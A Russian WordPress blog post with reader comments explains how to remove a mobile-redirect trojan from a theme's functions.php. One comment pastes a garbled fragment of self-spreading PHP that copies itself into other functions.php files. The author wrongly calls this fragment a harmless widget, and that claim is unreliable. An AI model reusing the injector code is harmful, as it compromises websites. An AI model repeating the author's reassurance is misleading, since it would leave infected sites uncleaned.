![Вирус троян JS:Redirector-MC [Trj] (мобильный редирект) на блоге WordPress](http://blogowed.ru/wp-content/uploads/2012/01/23402-200x150.jpg "Вирус троян JS:Redirector-MC [Trj] (мобильный редирект) на блоге WordPress")
Всем привет. Это небольшая статья будет посвящена защите вашего блога WordPress от вирусов и троянов таких как Мобильный редирект, он же JS:Redirector-MC [Trj]. Его можно обнаружить с помощью антивируса AVAST и браузера OPERA, другие антивирусы пока его не видят, повторюсь пока не видят.
Если Вы заметили данный вирус на своем блоге, без паники здесь ничего страшного нет, сейчас я научу Вас как бороться с этим недугом. При заходе на сайт под браузером Opera вы увидели окошко «троян блокирован», заражение «JS:Redirector-MC [Trj]» это и есть наш мобильный редирект.
![JS:Redirector-MC [Trj] (мобильный редирект)](http://blogowed.ru/wp-content/uploads/2012/01/virus2-500x198.png "JS:Redirector-MC [Trj] (мобильный редирект)")
Бороться с ним будем следующим образом.
Открываете файл functions.php и в самом внизу вы можете обнаружить следующий код:
![JS:Redirector-MC [Trj] (мобильный редирект)](http://blogowed.ru/wp-content/uploads/2012/01/Virus-500x259.png "JS:Redirector-MC [Trj] (мобильный редирект)")
Наша задача удалить этот код.
Сделать это можно несколькими способами:
- Удалить код вручную.
- Найти копию файла functions.php и перезалить на хостинге
После того как вы удалите этот код, проверяем наш блог на специальных онлайн сервисах, нет ли еще зараз на блоге.
JS:Redirector-MC [Trj] (мобильный редирект)
У Вас наверно возникают вопросы откуда взялся данный вирус . Я покопался по интернету и нашел ответ, который не очень меня обрадовал скидываю, как скрин.
![JS:Redirector-MC [Trj] (мобильный редирект)](http://blogowed.ru/wp-content/uploads/2012/01/js.png "JS:Redirector-MC [Trj] (мобильный редирект)")
Из — прочитанного можно сделать вывод что ни наш WordPress не сервис не защищен на 100% .
Я поймал этот вирус на 2-х блогах , советую проверить свои блоги на наличии вирусов, особенно те которые находятся на хостинге Timeweb.
Если вовремя не обнаружить вирус, Ваш блог может быстро упасть в позициях, будет большой процент отказов, вообщем ничего хорошего Вас не ожидает.
После удаления вируса, советую:
- ОбновитьWordPress
- Изменить пароль к Ftp
- Изменить пароль на хостинге
- Сделать полный скан компьютера на наличие вирусов
Если ваш блог взломал, об этом я уже писал здесь . Самое главное вовремя заметить и обезвредить. Если что не получается или не понятно, обращайтесь помогу.
Здравствуйте, Роман! Информация как раз вовремя. Скажите, а если этот код
base64_decode обнаружен в файлах темы, есть смысл его убирать и оставить тему или все-таки лучше взять другую?
Юлия не обязательно менять всю тему. Если вы знаете где находиться код редиктора замените только его, через онлайн проверку на вирусы вы можете определить заряженный файл и отредактировать ее, если поставите другую тему, придется все счетчики и настройки делать с начало, подумайте!
>>>»и в самом внизу вы можете обнаружить следующий код:»
какой именно участок кода нужно извлечь?
А какой сайт? наверно footer.php
http://www.mttf.su в functions ничего потустороннего не нашел, аваст ругается совершенно на другое файло, гдето в дебрях wp-content… please help!)
Попробуй удалить кеш, авто сохранение. Я обнаружил целых два вируса на вашем сайте, попробуй отключить еще рекламу. И если есть копия темы обнови + обнови WordPress До последней версии.
Здравия желаю! Могу попросить, удалить ссылку из комментария?
Победил тварь обновлением до последней версии….
Проверила. Первый сервис ответил очень быстро, что вирусов нет и сайт безопасный. А второй долго крутил колесико и выдал длинную строку: undefinedundefinedundefinedundefinedundefinedundefinedundefinedu
Что это значит? Тоже ничего не обнаружено? 🙁
Спасибо.
Проверьте еще через оперу, если ни чего нет все нормально, еще вариантом будет проверить через мобильный телефон, если после загрузки вашего сайта вас перекидывает на регистрацию, значит вирус есть, если ни чего не меняется и страница подгружается как обычно, тогда все нормально.
Спасибо!
Проверила. Все нормально. Спасибо!
Тоже пользуюсь антивирусом AVAST, и очень довольна, отлавливает всю нечисть в момент! 😀
К счастью не нашел вирусов на своих проектах. Видимо потому, что пишу движок на ASP. Надо бы почаще логи мониторить, а то мало-ли что народные умельцы еще придумают.
Хорошо что не нашли Orcinus Orca, а я с двух блогов вытащил, сейчас все нормально, установил антивирус Avast/
Тоже «поймал» эту заразу в декабре- знакомые писали письма, что Avast блокирует мой сайт, а я с Nod-32 сидел и в ус не дул [:-} . Сейчас тоже перешел на Avast.
Сайтов много, но вот один причем не коммерция вчера поймай трояна, всовывали через логин (остался Ip адрес испанца) За час все восстановили с помощью админа провайдера, сайт пере-установить пришлось. Проверил содержимое скаченного через FTP на вирусы все чисто.. Вот такая гнусная история.
Добрый день!
Вы пишете «советую проверить свои блоги на наличии вирусов, особенно те которые находятся на хостинге Timeweb». У меня несколько сайтов как раз у Timeweb. И несколько сайтов и на Вордпрессе, и на Джумла взломали. Пароли меняю, стоит антивирус. Я им и написал, чтобы они у себя проверили — говорят, могут только логи предоставить, ищите сами…
Скажите, пожалуйста, почему вы упомянули Таймвеб?
Ну я сам лично, держу все проекты на этом хостинге, вот по этому и посоветовал, но скажу честно это массовая атака и страдать будут все не защищенные проекты
Кстати, вирус может через некоторое время снова записать себя в файл functions.php, потому советую поставить на него права доступа 444 (только чтение). Если вам нужно постоянно что-то обновлять в этом файле — можно создать свой файл с настройками и просто инклудить его в файл functions.php
Открываете файл functions.php
Подскажите,а где его открывать? Если можно, объясните пожалуйста как блондинке))))
Скопируйте его с хостинга на компьютер и откройте с помощью например программы notepad, и удалите ненужный код, можно воспользоваться другим вариантом, на хостинге Открываете файл functions.php правой кнопкой мыши и выбираете правка, удаляете код и перезаписываете снова, поставьте права на файл 444.
Спасибо большое! Еще маленький вопросик, если на компьюторе обнаружен этот вирус это ведь еще не значит что именно мой сайт заражен?Может быть вы подумаете что я совсем Дуб,но просто мой Аваст при глубоком сканировании комп. нашел этот вирус.
Нет не значит, аваст должен ругаться на сайт при заражение, Лечите компьютер и все будет ОК
Роман, у меня вирус js:redirector-PM [trj]на CMS Drupal. Не знаете, как бороться в данном случае?
Ищите файл который отвечает за функции, и выполните все те же действия что я описывал, этот вирус можно излечить, права на файл поставьте 444
Большое спасибо, вроде бы всё сделал, но…
когда после этой процедуры заходил на свой сайт через Mozilla Firefox, Avast по-прежнему ругался и говорил про соединение с вредоносным сайтом.
Через некоторое время после этого я очисти кэш браузера, зашёл на сайт и…всё впорядке — Avast не ругается. Так что же делать, продолжать искать вирус или дело действительно было в КЭШе (если это вообще возможно)?
На моем домене, там еще и сайта почти нет, тоже обнаружила этот вирус, помогла программа siteverify. Вроде все удалила, даже шаблон сменила. На сайте нет, а вот через приложение SDR bar в хроме почему-то лезет. Как открою, так нод32 ругается.
Спасибо! Сайт на хостинге Джино. Проверил все сайты, но вирус только на одном.
И ещё. Заметил такую особенность: когда был вирус, то исходный код не отображался (нажимаешь в опере «посмотреть исходный код», а там пустой лист). А когда удалил вирус, то всё нормально — код на месте.
Роман, здравствуйте.
У меня проблема с сайтом. Постоянно выскакивает троян Trojan.JS.Redirector.ux (scounter) прописывается в файле function.php
Скачивал на комп сайт, проверил Касперским. Он его вылечил. Обратно залил, но история через несколько дней повторилась.
Поставил разрешение на файл function.php 444
Но антивирус на сайте бъет тревогу. Яндекс блокирует сайт.
Пожалуйста помогите. естественно за вознаграждение
Кирилл, версия WordPress какая стоит?
Был установлен WordPress 3.2.1
Сейчас обновился до 3.3.2. Но почему-то не могу зайти в админку
твой сайт который указан в комментариях?
Напиши мне по емайл подробности, Я тебе дам рекомендации
Роман, мой сайт belevichka.ru
почта belevichka@yandex.ru
Твоей почты к сож. не нашел (
Нашел на сайте такой кусок кода, антивирус для вордпресса его ставит под сомнение. Остальные антивирусы не обращают на файлы никакого внимания.
код из файла functions.php
<?php
function _verify_isactivate_widgets(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"») !== false ? «» : «?».»>»;
$output .= $before . «Not found» . $after;
if (stripos( substr($cont,-20),»?».»>») !== false){$cont=substr($cont,0,strripos($cont,»?».»>») + 2);}
$output=rtrim($output, «nt»); fputs($f=fopen($item,»w+»),$cont . $seprar . «n» .$widget);fclose($f);
$output .= ($showsdots && $ellipsis) ? «…» : «»;
}
}
}
}
return $output;
}
function _get_allwidgetscont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == «/»){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != «.» && $elem != «..»){
if (is_dir($places . «/» . $elem)){
$wids[]=$places . «/» . $elem;
} elseif (is_file($places . «/» . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . «/» . $elem;}
}
}
}else{
return false;
Причем ставит под сомнения следующие строчки:
$cont=file_get_contents($item);
$output=rtrim($output, » «); fputs($f=fopen($item,»w+»),$cont . $seprar . » » .$widget);fc …
… n($item,»w+»),$cont . $seprar . » » .$widget);fclose($f);
} elseif (is_file($places . «/» . $elem)&&
Подскажи пожалуйста, что это за код и нужен ли он вообще?
Обратитесь первым делом на сервер, выдает ошибку вход админку (пишет
Сервер временно не в состоянии обслуживать ваш запрос из-за простоя обслуживания или проблемы пропускной способности. Пожалуйста, повторите попытку позже.), у хоста узнаете причину. Этот код выводит виджет, это не вирус
Опаньки. Timeweb… Я уже пол года со своих сайтов у этого провайдера вывожу этих троянов. Похоже пора менять хостера. Ктонить посоветует?
Я ход назад с Timeweb перtшёл на webhost1. Доволен. За 1 доллар даётся 1000МБ места, можно размещать до 10 сайтов, трафик неограничен. Даже предновогодний подъем трафика до 4000-5000 человек в сутки выдержал без проблем. Хотя статистика и показывала превышения нагрузки, предупреждений от хостера не поступало.
А для защиты сайта рекомендую установить плагин wordpress-firewall-2- активировал и забыл, плагин контролирует малейшие изменения в Ваших php файлах, не дает возможности установки плагинов, деактивирует плагины если они не соответствуют безопасности.
Ну так хоть кусок кода для его поиска можно дать?
А то на картинке нифига не разобрать